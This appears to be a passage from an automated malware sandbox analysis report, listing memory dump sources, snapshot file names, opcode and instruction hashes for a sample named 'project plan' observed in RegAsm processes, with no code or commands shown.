                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0

                                    Control-flow Graph (graph omitted; nodes call FreeConsole)
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ConsoleFree
                                    • String ID:
                                    • API String ID: 771614528-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A
                                    • API String ID: 0-3554254475
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:

                                    Execution Graph

                                    Execution Coverage:15.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:28.9%
                                    Total number of Nodes:457
                                    Total number of Limit Nodes:2
                                    (execution graph omitted; nodes reference KiUserExceptionDispatcher, LdrInitializeThunk and DuplicateHandle)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K
                                    • API String ID: 0-856455061

                                    Control-flow Graph (graph omitted; nodes call f65a60 and LdrInitializeThunk)
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42fbcdc13c12f612bac5d9a9e3456cdb498089db3d57274db273c4fa1d55a7f7
                                    • Instruction ID: b01e3cfa80fdb7997d0502f8e260c06f33760e063cb3e405c644b53abadfff20
                                    • Opcode Fuzzy Hash: 42fbcdc13c12f612bac5d9a9e3456cdb498089db3d57274db273c4fa1d55a7f7
                                    • Instruction Fuzzy Hash: 1A62DD74E052288FDB24DF69C884BDDBBB2BB49305F2085E9D808A7355DB30AE81DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ec41bc59faa07ec3e3f3117602d57136c3f2f934574c6e204da3ef1356cc4f2e
                                    • Instruction ID: 4996e9349ebe575aea36975ae69dc4d66d38deb814c26c9b330cd0a6de508054
                                    • Opcode Fuzzy Hash: ec41bc59faa07ec3e3f3117602d57136c3f2f934574c6e204da3ef1356cc4f2e
                                    • Instruction Fuzzy Hash: 08727B74E012288FDB65DF69DD84BDABBB2BF88300F1481E9A44DA7265DB345E81CF41
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cbda4cf32751a0d158e61f6db36a9ce104dbd84bd2c25cb04ac8999202b9d4e0
                                    • Instruction ID: 133b22c824c50a8d8135d15d3459d1c48d8ade44985753258b36044f3a8b0b1e
                                    • Opcode Fuzzy Hash: cbda4cf32751a0d158e61f6db36a9ce104dbd84bd2c25cb04ac8999202b9d4e0
                                    • Instruction Fuzzy Hash: 57E13174E04358CFDB15DFA4C994B9DBBB2AF89304F1481AAD808AB3A5DB345E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fccbc45588024f14fe8858497eac9d619fb39c7d205894eb433385aa11076137
                                    • Instruction ID: e99c72187c674c9ad269dc336cc3dc777d584107e23e455eab046c8be4ddbf17
                                    • Opcode Fuzzy Hash: fccbc45588024f14fe8858497eac9d619fb39c7d205894eb433385aa11076137
                                    • Instruction Fuzzy Hash: AAC1AC74E00218CFDB54DFA5D984B9DBBB6BF88304F2084AAD809AB355DB349E85DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ee66ac5a399c22423849c60888618db5d0a5919fe18959939892df09b1f4605
                                    • Instruction ID: acb24493df475526abd6fcbb6cd85dfffa05ba1626901e43532cbef79cc73395
                                    • Opcode Fuzzy Hash: 1ee66ac5a399c22423849c60888618db5d0a5919fe18959939892df09b1f4605
                                    • Instruction Fuzzy Hash: 41D1AE74E00318CFDB54DFA5D954B9DBBB2AF89300F2085AAD809AB355DB345E85DF10
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 166932619e92e936d49ebece29d67f6657154e73fdc2cd58c512f7b9ce52b94a
                                    • Instruction ID: 92342ae2f5f0abb10ed115ed20b11e386cf9a024b83bd73b093b87d2005e5785
                                    • Opcode Fuzzy Hash: 166932619e92e936d49ebece29d67f6657154e73fdc2cd58c512f7b9ce52b94a
                                    • Instruction Fuzzy Hash: E4D1AC74E00218CFDB54DFA5D984B9DBBB6EF88300F2085AAD809AB355DB349E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a1acd34ce5f71c0375e58f1ae44542c21e5485b61b1bd7099854f687b008d30
                                    • Instruction ID: 1f7b4d65640004dc58ea342cb0de7796dffb6f0f8c7a47a8664a01f1ceb6861a
                                    • Opcode Fuzzy Hash: 2a1acd34ce5f71c0375e58f1ae44542c21e5485b61b1bd7099854f687b008d30
                                    • Instruction Fuzzy Hash: 72D1AE74E00218CFDB54DFA5D984B9DBBB2BF88300F2085AAD809AB355DB355E85DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4a89657dc223d69f52912af80fb961ae6c35e719ff56370b855c2481efcb671
                                    • Instruction ID: 298306723e4a82f43b872810bbfbd72dfc2a3cfc419b46ea890b8d13f301a116
                                    • Opcode Fuzzy Hash: b4a89657dc223d69f52912af80fb961ae6c35e719ff56370b855c2481efcb671
                                    • Instruction Fuzzy Hash: F4D1CF74E00218CFDB54DFA5D984B9DBBB2BF88300F2081A9D809AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cff6d6b7b9ab56fc8b9d95471fddbc8d339f2fa95041ca164cf2de466d068e30
                                    • Instruction ID: c303218c4d57c25268479204e25bfcb3d7bf53b35028aac1f04b02d88df0b01f
                                    • Opcode Fuzzy Hash: cff6d6b7b9ab56fc8b9d95471fddbc8d339f2fa95041ca164cf2de466d068e30
                                    • Instruction Fuzzy Hash: 7AC1C174E01218CFDB54DFA5C994BADBBB2BF89300F1080A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2dac0a16bba2f8c98a388c14f2ea807b6dc84843052cbccedc9a7f8df9ee2f9
                                    • Instruction ID: 3567a48c5a9ae81e93eb9dcff742361a40763be78064afb48dad9b61847b142b
                                    • Opcode Fuzzy Hash: b2dac0a16bba2f8c98a388c14f2ea807b6dc84843052cbccedc9a7f8df9ee2f9
                                    • Instruction Fuzzy Hash: B1C1C174E00218CFDB54DFA5C984BADBBB2BF89300F1080A9D809AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 00057fd562bf482f266211de60e72c506d3e7c0079bb074f740eba43c58aa228
                                    • Instruction ID: 44b4d52df9aedcddcfb6cb2b367a015df99adeb2130460512b7c1501cd378b0c
                                    • Opcode Fuzzy Hash: 00057fd562bf482f266211de60e72c506d3e7c0079bb074f740eba43c58aa228
                                    • Instruction Fuzzy Hash: 13C1C274E00218CFDB54DFA5D984B9DBBB2BF89304F2080A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5671e1a70e4df60b207609aaf6931cf12103b78ff05f7fd517b0633c77854ce4
                                    • Instruction ID: 841937875a768fd77ca9e37a97eb2ac2a8b156f994e2bb89e323944cea16a8f5
                                    • Opcode Fuzzy Hash: 5671e1a70e4df60b207609aaf6931cf12103b78ff05f7fd517b0633c77854ce4
                                    • Instruction Fuzzy Hash: E5C1C274E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6040a45adb638b1fa41ad489227a291260f9730328f9fc1fe5dcb6d0b277789
                                    • Instruction ID: 99fd93057ea2a084b362494c4be5ba8db3b7b3cada5568ed49c3f83df26a9710
                                    • Opcode Fuzzy Hash: e6040a45adb638b1fa41ad489227a291260f9730328f9fc1fe5dcb6d0b277789
                                    • Instruction Fuzzy Hash: 5EC1C074E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bc83642c88fec3ab20a6c2f63ebfb58a0a39bafb627924c53e9105c7b3c6ca4a
                                    • Instruction ID: 42596905d04761c7faa8779f3c2dc6318c68f0f0e125cd4542936a45f495a0b1
                                    • Opcode Fuzzy Hash: bc83642c88fec3ab20a6c2f63ebfb58a0a39bafb627924c53e9105c7b3c6ca4a
                                    • Instruction Fuzzy Hash: B2C1C174E00218CFDB54DFA5C984B9DBBB2BF89304F2081A9D819AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0eb88875a37f207057291836d586b5f5398f388896a8a8da28a6092cdb76ae3c
                                    • Instruction ID: a1699776e8806c42fc73915059697c0ab35c7667810f81ca8e2a9e8e7d013edc
                                    • Opcode Fuzzy Hash: 0eb88875a37f207057291836d586b5f5398f388896a8a8da28a6092cdb76ae3c
                                    • Instruction Fuzzy Hash: 2AC1D274E01218CFDB54DFA9C984BADBBB2BF89300F1084A9D808AB365DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a246f432e758f0f8d59a6ce70cba27d7ba6583a33c387ee1fe95458dedc60cce
                                    • Instruction ID: f03e7b4c031868e372fc297b0dec83cd3faecd3bccf34e017857ae10ee450976
                                    • Opcode Fuzzy Hash: a246f432e758f0f8d59a6ce70cba27d7ba6583a33c387ee1fe95458dedc60cce
                                    • Instruction Fuzzy Hash: F9C1C174E00218CFDB54DFA5C984BADBBB2BF89304F1081A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 827baf9c2d4d437feca31abb1c20852d66927e2ffc102f7b115709fd5d26432c
                                    • Instruction ID: 33b8e070e3dbac0c8efabf45401596407fc40be9f9604dd75591e48e0ddc32c0
                                    • Opcode Fuzzy Hash: 827baf9c2d4d437feca31abb1c20852d66927e2ffc102f7b115709fd5d26432c
                                    • Instruction Fuzzy Hash: 12C1C174E00218CFDB54DFA5C984BADBBB2BF89300F1085A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7bdd064812b78704849df3a4de5e5b92561a2f937b79ef18b99f477f78c393a
                                    • Instruction ID: dbc587ccacd286f6b75a8659a750842cd3209fb9894532f0df53ef5de83578b7
                                    • Opcode Fuzzy Hash: e7bdd064812b78704849df3a4de5e5b92561a2f937b79ef18b99f477f78c393a
                                    • Instruction Fuzzy Hash: DDC1C274E00218CFDB54DFA5C984BADBBB2BF89300F1080A9D809AB365DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 64aed12c807fbeb16fa72692a469873055cd8e9c127ad4a4e82cac6cad74f69d
                                    • Instruction ID: 58ef25f3e661c49217a912aa1f2a924fbf4d08db4b54471fccd3210973f24b19
                                    • Opcode Fuzzy Hash: 64aed12c807fbeb16fa72692a469873055cd8e9c127ad4a4e82cac6cad74f69d
                                    • Instruction Fuzzy Hash: 40C1C274E01218CFDB54DFA9C984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4d1c0739cf139ba4d6956c434d18790e586819f32f1829df478da600283e72d1
                                    • Instruction ID: 6d040e531593c5606a1fb058975afd86012f8be8d7b27e09e2049a6c13d87d7b
                                    • Opcode Fuzzy Hash: 4d1c0739cf139ba4d6956c434d18790e586819f32f1829df478da600283e72d1
                                    • Instruction Fuzzy Hash: 29C1C174E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50064029e332c517a0e2cdb326d81d4c208eeae174951f68373e618a20451e49
                                    • Instruction ID: 367f298232b808695feaef79ce4253281a1deeed9f0fa60d47d28b3f89d1d372
                                    • Opcode Fuzzy Hash: 50064029e332c517a0e2cdb326d81d4c208eeae174951f68373e618a20451e49
                                    • Instruction Fuzzy Hash: 60C1D274E00218CFDB54EFA5C984BADBBB2BF89304F1084A9D819AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88d94e0ae511f0ff52ef06e1973d0c00f650d58f094699e2be7f20e88202c0c7
                                    • Instruction ID: a82b7b9405d87a748a1fc273eb02f01a23faeba404e066882300f8e427e9b2a4
                                    • Opcode Fuzzy Hash: 88d94e0ae511f0ff52ef06e1973d0c00f650d58f094699e2be7f20e88202c0c7
                                    • Instruction Fuzzy Hash: 72C1D374E00218CFDB54EFA5D984BADBBB2BF89300F1080A9D819AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f85e265d264f14b4970aefe3c85801028edded65423acee2f51ca2da1b65a9f
                                    • Instruction ID: 0487eda69a1e9b8e6655e9602f8003f3d77a03c3be6cf5b5af88f55aea04f5c4
                                    • Opcode Fuzzy Hash: 9f85e265d264f14b4970aefe3c85801028edded65423acee2f51ca2da1b65a9f
                                    • Instruction Fuzzy Hash: 2DC1D374E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48c4fb153439ba0802584c047bb5720a829ce666cf390c90f08ca8c3e2a74dd1
                                    • Instruction ID: 496028fafc37de00e571ff2c77c75fdee93447b0dd0c28976f303a21beec7e04
                                    • Opcode Fuzzy Hash: 48c4fb153439ba0802584c047bb5720a829ce666cf390c90f08ca8c3e2a74dd1
                                    • Instruction Fuzzy Hash: 46C1D274E00218CFDB54EFA5D984B9DBBB2BF89304F1084A9D809AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a93f5dccaa3234d03fbe9402d7b7fb51233a93df1a1b5a8c141e3e6eb5bf7369
                                    • Instruction ID: b7f0a60309336ca93834f83917f07c032c5a9019736f75ba56f40c384e06c456
                                    • Opcode Fuzzy Hash: a93f5dccaa3234d03fbe9402d7b7fb51233a93df1a1b5a8c141e3e6eb5bf7369
                                    • Instruction Fuzzy Hash: 4DC1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1084A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 473fe2802ba8db1e5c8de6407e42765bef2d571760ddf7a732a1d0a4236319b4
                                    • Instruction ID: ec8bc98db48fdc899eb2965657ef537eeeb0557395b719714f94703aa6625fb2
                                    • Opcode Fuzzy Hash: 473fe2802ba8db1e5c8de6407e42765bef2d571760ddf7a732a1d0a4236319b4
                                    • Instruction Fuzzy Hash: BBC1D274E00218CFDB54EFA5C994BADBBB2BF89300F1084A9D808AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ce73ce43dc5e4930e062177fedd06dd45357b9e4d144076e67ac63153bb04c0
                                    • Instruction ID: ffa8f5c31645dee3378144d63242002cbba567c119d9e748ddbe13fb22589f40
                                    • Opcode Fuzzy Hash: 2ce73ce43dc5e4930e062177fedd06dd45357b9e4d144076e67ac63153bb04c0
                                    • Instruction Fuzzy Hash: ADC1C374E00218CFDB54EFA5D944B9DBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5c7456bfaf54fff7e51b345fcb9035bccc5e36113c9949a53dd1e1144ff85ca
                                    • Instruction ID: 81b5e80d46c34271719501b454e17d906c187e84565e4eb96b3bacbaa38b418a
                                    • Opcode Fuzzy Hash: d5c7456bfaf54fff7e51b345fcb9035bccc5e36113c9949a53dd1e1144ff85ca
                                    • Instruction Fuzzy Hash: 98C1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1080A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8de8a712170233a90a3823353d11bdf370d21fa54e5c677f0c1b61f05ae677aa
                                    • Instruction ID: ac516125e0264d3b0e8cdcb568eace71d0b9306f41ddd97e74b3a21e970be1f5
                                    • Opcode Fuzzy Hash: 8de8a712170233a90a3823353d11bdf370d21fa54e5c677f0c1b61f05ae677aa
                                    • Instruction Fuzzy Hash: ECC1C374E01218CFDB54EFA5C944B9DBBB2BF89300F1081A9D819AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3811a280be31ee9ab4dc3fda8303afb1b93a83fad90f2add3c19861e7e44d9c0
                                    • Instruction ID: 7d4c7bfc050e9538c776f82350cc1d20bbfb2af02bf6ebc883420a265a0b7538
                                    • Opcode Fuzzy Hash: 3811a280be31ee9ab4dc3fda8303afb1b93a83fad90f2add3c19861e7e44d9c0
                                    • Instruction Fuzzy Hash: B9C1C274E00218CFDB54EFA5D984B9DBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8967cdb42db9bc5f274c6a0a2dfc864340b5186f11c43cd063570c8f5a3eef52
                                    • Instruction ID: 19d14c55026f7e4dcd1464d895aceb1f35faa5ff5caa60f76e419346b0c8a8d6
                                    • Opcode Fuzzy Hash: 8967cdb42db9bc5f274c6a0a2dfc864340b5186f11c43cd063570c8f5a3eef52
                                    • Instruction Fuzzy Hash: A9C1D374E00218CFDB54EFA5C994B9DBBB2BF89300F1081A9D819AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d22891a354ad1c6d5255e549e0d78c0f24c3a272f5ca81cc6224d33847c7c64
                                    • Instruction ID: 07c1316227c8e710cb2d90eb63e1e19c60b652a32e046afbca3d12abf01af178
                                    • Opcode Fuzzy Hash: 3d22891a354ad1c6d5255e549e0d78c0f24c3a272f5ca81cc6224d33847c7c64
                                    • Instruction Fuzzy Hash: 68C1C074E00218CFDB54EFA5D984BADBBB2BF89300F1084A9D819AB355DB359E85CF50
                                    Memory Dump Source
